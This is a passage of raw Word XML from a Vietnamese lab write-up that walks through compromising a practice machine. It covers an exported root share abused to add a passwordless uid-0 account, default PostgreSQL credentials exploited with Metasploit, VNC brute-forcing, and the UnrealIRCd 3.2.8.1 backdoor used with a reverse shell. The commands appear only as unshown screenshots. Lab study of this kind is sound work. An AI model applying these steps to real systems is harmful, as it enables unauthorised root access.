    <w:p w14:paraId="7A2F524D" w14:textId="75A6866F" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="108050E8" wp14:editId="25AC7C12">
            <wp:extent cx="3086531" cy="885949"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="65025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1426" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3086531" cy="885949"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF9DD57" w14:textId="5FF2D6E5" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Kết quả cho thấy máy lab chia sẻ thu mục gốc, điều này khiến mình có thể truy cập nó và làm được rất nhiều thứ, ở đây mình sẽ sử dụng 1 cách để có quyền root. Trước tiên là chuyển thư mục gốc về máy mình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5AD741" w14:textId="10E12AE7" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2937914C" wp14:editId="3E844434">
            <wp:extent cx="5731510" cy="1094105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="125127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8093" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1094105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4320CABE" w14:textId="072CD967" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Truy cập vào etc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA3EEAE" w14:textId="7ACAAF3A" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CB14F36" wp14:editId="4938BBD5">
            <wp:extent cx="2657846" cy="438211"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="4345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077" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2657846" cy="438211"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B6742A" w14:textId="1015AE2F" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Truy cập vào passwd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D41BA1" w14:textId="3B5297F2" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A9BE99E" wp14:editId="3741C092">
            <wp:extent cx="2867425" cy="562053"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="6815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7205" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2867425" cy="562053"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="526E08DF" w14:textId="045509BB" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Trong này, mình sẽ tạo thêm 1 user abc không có mật khẩu với uid và gid là 0, đây là id của root và thư mục chính là /root với shell mặc định là /bin/bash. Từ đây máy lab sẽ có thêm 1 user abc với quyền root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2292CF" w14:textId="2C5F3D85" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CC7EE88" wp14:editId="7D16C1BA">
            <wp:extent cx="4892464" cy="4861981"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="12119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4004" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4892464" cy="4861981"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CCEA93" w14:textId="29DB5384" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Thử telnet đến máy lab với tài khoản abc và kiểm tra thì thấy nó có toàn quyền root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B053A70" w14:textId="4FB44919" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52651A19" wp14:editId="3CFAA443">
            <wp:extent cx="5731510" cy="4714240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5200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3694" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4714240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="092082EB" w14:textId="77777777" w:rsidR="00924CA5" w:rsidRDefault="00924CA5"/>
    <w:p w14:paraId="73923C4A" w14:textId="0AC75797" w:rsidR="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>postgresql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52339AD9" w14:textId="488188EE" w:rsidR="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C6EDCB7" wp14:editId="4BD4E7C0">
            <wp:extent cx="5731510" cy="488315"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="253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12" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="488315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36565BC5" w14:textId="4D56A5A4" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="00924CA5">
      <w:r>
        <w:t xml:space="preserve">Sử dụng chế độ scan </w:t>
      </w:r>
      <w:r>
        <w:t>postgresql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và phát hiện có tài khoản có username và password là postgresql:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0053745E" w14:textId="62DF0521" w:rsidR="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20D4A96B" wp14:editId="5490BDA0">
            <wp:extent cx="5731510" cy="1997075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="151121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1825" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1997075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="510408D2" w14:textId="2EB1018A" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="00924CA5">
      <w:r>
        <w:t>Ngoài ra metaspolit có một mã khai thác có thể sử dụng trên này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400DF34C" w14:textId="588FE68F" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="238CD710" wp14:editId="78645E25">
            <wp:extent cx="5731510" cy="1167765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4881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18567" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1167765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7455F1A6" w14:textId="322C0038" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D113F88" wp14:editId="686628B9">
            <wp:extent cx="5731510" cy="1828165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="1614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154" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1828165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18812982" w14:textId="0948FA6E" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Sử dụng metasploit theo hướng dẫn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC5C83F" w14:textId="31447B5B" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B3D23BB" wp14:editId="3A040422">
            <wp:extent cx="5731510" cy="3279775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="147632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1802" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3279775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB52A2A" w14:textId="6C0830B4" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Thiết lập rhost của máy lab để tấn công vào và lhost của máy kali để khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D420A8" w14:textId="2673C8A8" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42E58AD4" wp14:editId="6AD8E79A">
            <wp:extent cx="5731510" cy="1301750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3839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7088" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1301750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="131599A5" w14:textId="44F1D2C1" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Run và thành công vào shell dưới user postgress:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3257429E" w14:textId="05C11ACF" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C2E1D7C" wp14:editId="31FEED86">
            <wp:extent cx="5731510" cy="1023620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="8779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3788" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1023620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0427D974" w14:textId="52D5E389" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Sử dụng su để lên tài khoản abc có quyền root đã được tạo từ trước:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203F0581" w14:textId="0E065922" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24962600" wp14:editId="241C11D1">
            <wp:extent cx="5731510" cy="763905"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="174900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4579" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="763905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4734EA" w14:textId="65085B62" w:rsidR="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vnc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479BE67E" w14:textId="62FB618D" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60DA4D7D" wp14:editId="55AC5B0F">
            <wp:extent cx="5731510" cy="762635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="19430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7468" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="762635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6410FF" w14:textId="4864F9AE" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Thực hiện tấn công bruteforce và phát hiện mật khẩu là password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154458FF" w14:textId="00F1F28F" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CF3013C" wp14:editId="36ACCC72">
            <wp:extent cx="5731510" cy="1910080"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="171835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50299" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1910080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD92EBE" w14:textId="2ABE69AB" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Kết nối thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A6E6BB" w14:textId="05015B88" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20212070" wp14:editId="35A01F9C">
            <wp:extent cx="5731510" cy="1898015"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="115351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0075" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1898015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F32387" w14:textId="77777777" w:rsidR="00924CA5" w:rsidRDefault="00924CA5"/>
    <w:p w14:paraId="2F9B8376" w14:textId="415F6434" w:rsidR="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>irc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52194C93" w14:textId="06CDC2C0" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EB4F5B3" wp14:editId="0E1A599E">
            <wp:extent cx="5731510" cy="1706245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="5323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3437" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1706245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2452E124" w14:textId="28727835" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Irc ở phiên bản 3.2.8.1, tìm kiếm trên gg thì có mã khai thác của phiên bản này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0D4BDA" w14:textId="048D4F9C" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C33BDC8" wp14:editId="47708FE1">
            <wp:extent cx="5731510" cy="1328420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="3880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1373" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1328420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5097EB2A" w14:textId="31705F32" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Sử dụng metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FCCE23" w14:textId="2498FCBB" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C244C15" wp14:editId="0FD495E4">
            <wp:extent cx="5731510" cy="473710"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="12327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1199" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="473710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD63E72" w14:textId="1FB7411E" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Set thêm reverse shell vào backdoor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A704B57" w14:textId="20DAC245" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="035BA6DD" wp14:editId="0522BA9A">
            <wp:extent cx="5731510" cy="263525"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1107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699" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="263525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD737E7" w14:textId="11772590" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22E8B592" wp14:editId="50A22309">
            <wp:extent cx="5731510" cy="553720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8106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4769" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="553720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F072327" w14:textId="3A4BF017" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Run và thành công vào shell root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6BA049" w14:textId="3F1EC9A5" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4452FE7D" wp14:editId="448A8B56">
            <wp:extent cx="5731510" cy="2217420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="199023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3998" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
